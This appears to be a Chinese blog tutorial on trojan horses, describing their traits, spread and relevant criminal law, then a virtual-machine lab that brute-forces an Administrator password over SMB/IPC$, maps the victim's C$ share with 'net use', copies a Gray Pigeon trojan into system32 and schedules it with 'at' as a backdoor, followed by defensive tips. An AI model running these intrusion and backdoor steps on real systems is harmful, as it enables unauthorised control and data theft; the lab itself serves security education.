数据来源

  1. 如何使用 Kali Linux 进行中间人攻击

目的

通过经典的木马攻击还原场景,来学习木马的制作,并实现植入木马对目标主机进行完全控制。

背景

木马概述

  • 木马通常称为黑客程序,恶意代码,也称为特洛伊木马
  • 基于远程控制的黑客工具

木马的特性

  • 隐蔽性
  • 潜伏性
  • 再生性

木马的组成

  • 客户端程序

客户端程序是安装在攻击者(黑客)方的控制台,它负责远程遥控指挥

  • 服务器端程序

服务器端程序即是木马程序,它被隐藏安装在被攻击(受害)方的电脑上,目标主机也称为肉鸡

木马的危害

  • 盗取用户信息

如:网游账户、网银信息、QQ密码等

  • 传播病毒
  • 占用系统资源,降低电脑效能
  • 将本机作为工具来攻击其他设备等

中了木马的征兆

  • 硬盘不停的读写
  • 鼠标键盘不听使唤
  • 窗口突然被关闭
  • 新的窗口莫名其妙地打开

木马传播途径

  • 网页浏览时利用浏览器漏洞或浏览器插件(H35h,迅雷等)漏洞;
  • 通过QQ,MSN等即时通讯软件,发送恶意网址链接或木马病毒文件;
  • 使用U盘等移动存储介质;
  • 打开陌生的邮件,通过电子邮件内恶意代码或含木马病毒的附件;
  • 伪装成多媒体影音文件或植入木马的应用软件,利用P2P平台和网站传播
  • 利用操作系统漏洞或弱口令直接远程置入;
  • 下载来源不明的程序。

网络安全法摘录:2017年6月1日正式实施

中华人民共和国刑法(第285、286条)

第二百八十五条

违反国家规定,入侵国家事务、国防建设、尖端科学技术领域的计算机信息系统,处三年以下有期徒刑或者拘役

第二百八十六条

违反国家规定,对计算机信息系统功能进行刪除、修改、增加、干扰、造成计算机信息系统不能正常运行,后果严重的,处五年以下有期徒刑或者拘役;后果特别严重的,处五年以上有期徒刑。

违反国家规定,对计算机信息系统中存储、处理或者传输的数据和应用程序进行删除修改、增加的操作,后果严重的,依照前款的规定处罚。

故意制作、传揣计算机病等破坏性程序,影晌计算机系统正綰运行,后果严的,依照第一款的规定处罚

中华人民共和国刑法修正案(七)

在刑法第二百八十五条中增加两款作为第二款、第三款:“违反国家规定,侵入前款规定以外的计算机信息系统或者采用其他技术手段,获取该计算机信忘系统中存储、处理或者传输数据,或者对该计算机信息系统实施非法控制情节严重的,处三年以有期徒刑或者拘役,并处或者单处罚金;情节特别严重的,处三年以上七年以下有期徒刑,并处罚金。

提供专门用于入侵、非法控制计算机系统的程序、工具,或者明知他人实施侵入、非法控制计算机信息系统的违法犯罪行为而为其提供程序、工具,情节严重的,依照前款的规定处罚。

实验准备

 环境:

Windowsxp -- 模拟黑客攻击机

Windows server2003 -- 模拟被木马控制方

工具(支持正版软件):

灰鸽子软件

暴力破解密码

端口扫描

密码本生成

基本流程

  • 信息收集

                如:

nslookup          # 收集域名的IP地址

whois               # 收集域名下的子域名

  • 扫描漏洞

namp、ScanPort(软件)扫描:ip范围、端口

手工测试端口:telnet  IP地址  测试端口

高级扫描:如IIS漏洞2003-IIS6.0、2008IIS7.0

扫描网站漏洞

  • 漏洞利用

                445端口漏洞利用之IPC$:net use

net use f:\\目标ip\share 密码 /user:用户     # 把对方的share文件映射到本地的f盘

很多电脑没有改管理员用户名的话用户名都是:Administrator   密码只能通过暴力破解

net use f: /del   # 删除映射的f盘

net use  * /del   # 删除全部映射

net use f:\\目标ip\c$ 密码 /user:用户     # 把对方的c盘映射到本地的f盘

net use f:\\目标ip\ipc$ 密码 /user:用户

  • 提权(shell环境、桌面环境、最高权限)
  • 擦除痕迹(毁尸灭迹)
  • 留后门
  • 写渗透测试报告

开始实验 (注意:本实验目的是用来了解攻击,以便更好的防御攻击,攻击犯法)

 准备两台虚拟机如:windowsXP -- 模拟黑客攻击机         windows server2003 -- 模拟被木马控制方

1)让两台虚拟机能互相通信(可以使用ping命令测试)

        如:windows server2003的IP配置成:10.1.1.1/24,windowsXP的IP配置成:10.1.1.2/24,然后把两台虚拟就桥接到同一个虚拟网络就行了。(现实中肉鸡一般是服务器所以不用担心无法通信)

2) 使用xp虚拟机利用445攻击2003,使用工具先扫描2003的IP地址端口,或者使用名命令测试:telnet IP  测试端口,如:80,23,3389,445

        3)暴力破解密码NTscan10只能针对445弹框做暴力破解,配合密码本生成器

软件的工作原理就是不断的执行命令:net use f:\\目标ip\ipc$ 密码 /user:用户    

4)拿到账号信息之后,就可以在我们计算机上获取对方命令行的管理员权限

      net use f: \\10.1.1.1\c$ 207080 /user:administrator  # 把对方的c盘映射到自己的f写啥字母都可以,尽量不写自己的电脑盘。

copy con haha.bat  # 创建一个脚本文件

copy haha.bat f:  # 把haha.bat拷贝到自己的f盘,我们的f盘就是对方c盘映射过来的,所以就相当于把文件拷贝到对方的C盘

2003这台虚拟机就多出了一个 haha.bat 文件

所以建议不需要时就把445端口关闭,需要再开启。  IPC$ 是一条空链接,别人登录这条链接就能浏览电脑所有数据

  net use  \\10.1.1.1\ipc$ 207080 /user:administrator        #把对方的整个电脑数据共享过来

拿到对方电脑的所有数据之后,我们就能进行一些操作,比如查看对方的磁盘文件目录

5)最后使用鸽子牧民战天在对方电脑留个后门,防止对方把445端口关了或把密码改了,以后又要重新渗透

制作木马

然后把木马程序放到对方的电脑上:copy d:\xiahezi.exe  \\10.1.1.1\c$\windows\system32

然后要运行一下木马程序,以后就变成服务了:at \\ip  时间  “要运行的文件路径”

运行对方的木马文件:  at  \\10.1.1.1  15:48  "c:\windows\system32\xiahezi.exe"

为确保网络安全,以下是一些防御漏洞和木马的措施:

  1. 及时更新系统和应用程序:及时应用软件厂商发布的补丁程序,以修复已知漏洞。

  2. 安装杀毒软件和防火墙:杀毒软件可以扫描计算机并清除恶意代码,防火墙可阻止未经授权的访问,有助于防止网络攻击。

  3. 使用强密码和加密技术:使用长、有复杂性和难破解的密码,同时考虑采用双重身份验证。

  4. 避免下载不明来源的文件:只从可信的网站或来源下载软件、文档等。

  5. 增强用户教育意识:定期开展网络安全培训,提高用户对网络威胁的认识和警惕性。

  6. 定期备份数据:保留多个副本,并在不同位置进行存储,以免被单个攻击或设备损坏所毁坏。

这些措施将有助于减少漏洞和木马对您的计算机和网络造成的风险。

漏洞与木马:如何保护您的网络安全相关推荐

  1. 下半年十大勒索攻击盘点、德国某医疗系统存在漏洞|12月29日全球网络安全热点

    安全资讯报告 2021年下半年最大的10次勒索软件攻击 1.卡塞亚 7月2日,Kaseya遭受了供应链攻击.Kaseya将此次攻击归因于利用其VSA产品的本地版本中的零日漏洞.这些缺陷允许攻击者绕过身 ...

  2. web安全从基础术语、windows/linux基础到安全漏洞/病毒木马挖掘与分析利用(持续更新)

    web安全知识从基础术语.windows/linux基础到安全漏洞/病毒木马挖掘与分析利用(持续更新) 专业术语 web环境搭建 windows基础 linux基础 linux系统命令 linux命令 ...

  3. 微软为阻止恶意软件侵害禁用Excel4.0宏、开源网站插件存在上万个安全漏洞|1月24日全球网络安全热点

    安全资讯报告 微软默认禁用Excel4.0宏以阻止恶意软件 微软已宣布Excel4.0(XLM)宏现在将默认禁用,以保护客户免受恶意文档的侵害. 10月,该公司首次在Microsoft 365消息中心 ...

  4. 黑客提交漏洞先获感谢后被举报 网络安全行业或现标志性事件

    在白帽子们看来,这就是一次普通得不能再普通的找漏洞行为:在世纪佳缘公司看来,这是在保护用户数据上做了一个正常的决定.但是当这两者碰到一起,就演变成了白帽子圈子里不亚于一场地震的抓人事件.谁对谁错?现在 ...

  5. 支付宝存漏洞?这10招保护个人信息赶紧保存起来!

    这两天,"支付宝实名认证存漏洞"的消息在微博上疯传,同时也引来了很多新闻媒体的关注,事件的起因是一位网友在不知情的情况下,支付宝账户莫名多出5个陌生子账户,支付宝方面表示是其泄露信 ...

  6. 超三万台电脑遭新恶意软件感染、联想修复特权提升漏洞|12月20日全球网络安全热点

    安全资讯报告 黑客在赎金被拒绝后在"暗网"上泄露了英国警方的机密数据 据英国<每日邮报>报道,英国一些警察部队持有的机密信息在一次令人尴尬的安全漏洞中被黑客窃取. 网络 ...

  7. 谷歌以54亿美元收购网络安全公司、数百万惠普设备存在高危漏洞|3月10日全球网络安全热点

    安全资讯报告 美国国家安全局(NSA)为保护IT基础设施提出最新建议 这份来自NSA网络安全局的文件鼓励采用"零信任"网络.该报告涵盖网络设计.设备密码和密码管理.远程日志记录和管 ...

  8. 著名勒索软件停止运营并发布解密密钥、大部分医院物联网设备存在安全漏洞|2月14日全球网络安全热点

    安全资讯报告 臭名昭著的迷宫(Maze)勒索软件停止运营并发布了解密密钥 在过去的三年中,Maze的工作人员使用其勒索软件诱捕了数十名受害者.现在,突然间,Maze似乎已经放弃了.他们已经发布了主解密 ...

  9. 德制语音设备现秘密后门、APT正在利用最新漏洞|12月22日全球网络安全热点

    安全资讯报告 多名俄罗斯人通过黑客攻击赚了数百万美元 美国当局周一表示,包括一名现在被美国拘留的商人在内的五名俄罗斯人实施了一项规模高达8200万美元的内幕交易计划,使他们能够从通过黑客攻击窃取的公司 ...

最新文章

  1. 2021年大数据常用语言Scala(六):基础语法学习 数据类型与操作符
  2. manager的烦恼
  3. C99 calloc、malloc和realloc区别
  4. content-type对照表
  5. LeetCode 807. 保持城市天际线
  6. win7磁盘清理_为什么要清理磁盘碎片,win7电脑怎么清理磁盘碎片
  7. SEO中HTML标签权重列表
  8. CSDN 文章自动显示全文
  9. android listview删除刷新,如何刷新Android ListView?
  10. html+CSS+JS实现小米官网(附全部代码)
  11. MySQL自定义函数计算年龄
  12. java ajax 读取流_javascript-如何使用AJAX读取实时流数据
  13. Cocoa与Cocoa Touch区别
  14. mysql-高级命令(1)和一些函数(悟已往之不谏,知来者之可追)
  15. HHUOJ 1001 汽水瓶 (水题)
  16. 一起捉妖 ios12.3更新了location不用了 怎么办
  17. OSChina 周日乱弹 ——我对象整天在家打游戏,怎么办?
  18. 新入职百度某员工发飙:前人代码写得像一坨屎,不能忍受,颠覆了对大厂的认知,...
  19. MATLAB教程(1) MATLAB 基础知识
  20. 华为1+X网络系统建设与运维(中级)——生成树协议(STP)

热门文章

  1. 花滑三周连跳_花滑未来能有人做五周跳吗 专家:四周半或是极限
  2. C语言编程>第三周 ⑧ 打印出杨辉三角形(要求打印出10行)
  3. 计算机学算法的意义,浅析算法在计算机编程中的重要作用
  4. 【前端】性能优化 - WebP
  5. python 发送邮件535, 'Error: authentication failed' 解决
  6. 【运动控制】运动控制类实现
  7. 区间选点(贪心,区间问题)
  8. 展示一下基于flask框架的网页播放器的代码
  9. 【协议森林】IPv6过渡技术之MAP-T/E技术
  10. python写linux命令_Python写的系统常用命令